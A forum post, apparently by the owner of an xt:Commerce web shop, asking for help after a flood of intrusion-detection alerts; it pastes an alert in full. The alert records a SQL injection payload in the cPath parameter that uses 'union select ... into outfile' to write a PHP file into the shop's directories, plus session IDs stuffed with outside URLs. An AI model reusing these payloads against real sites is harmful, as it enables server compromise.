Hello,
My shop is offline now.
Last night 160 mails arrived, then today when I switched on my PC about 280 "Attempted hack on your site? (type: Intrusion detection.)" mails had come in... both times we made the shop unreachable right away.
Mail content:
Attention site admin of Melinda Silbermode,
On DATE_FORMAT_LONG at DATE_TIME_FORMAT_SHORT the xt:C System has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did! Anyway, it was detected and blocked.
The suspicious activity was recognized in /homepages/46/d132898374/htdocs/silber/inc/xtc_Security.inc.php on line 68, and is of the type xt:C Security Alert.
Additional information given by the code which detected this: Intrusion detection.
Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it.
=====================================
Information about this user:
=====================================
This person is not logged in.
IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on]
IP according to HTTP_CLIENT_IP:
IP according to REMOTE_ADDR: 80.64.198.5
IP according to GetHostByName(80.64.198.5): 80.64.198.5
=====================================
Information in the $_REQUEST array
=====================================
REQUEST * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'
REQUEST * XTCsid : b653f6158df212286fd33472bd461f19
=====================================
Information in the $_GET array
This is about variables that may have been in the URL string or in a 'GET' type form.
=====================================
GET * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'
GET * XTCsid : b653f6158df212286fd33472bd461f19
=====================================
Information in the $_POST array
This is about visible and invisible form elements.
According to the shop, the following were online at the time:
Online ID Name IP address Start time Last click Last URL
00:06:54 0 Guest 80.64.198.5 20:19:27 20:19:27 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.qubestun
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.clubnata
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Frabotnitsa.r
00:07:00 0 Guest 80.64.198.5 20:19:21 20:21:41 /silber/product_info.php?cPath=29&products_id=134&
00:06:45 0 Guest 88.117.54.115 20:19:36 20:19:51 /silber/product_info.php?products_id=103&cPath=30
00:04:45 0 Guest 80.64.198.5 20:21:36 20:21:44 /silber/create_guest_account.php?
and of course I was online...
I would be very grateful for any help...
Kind regards to all!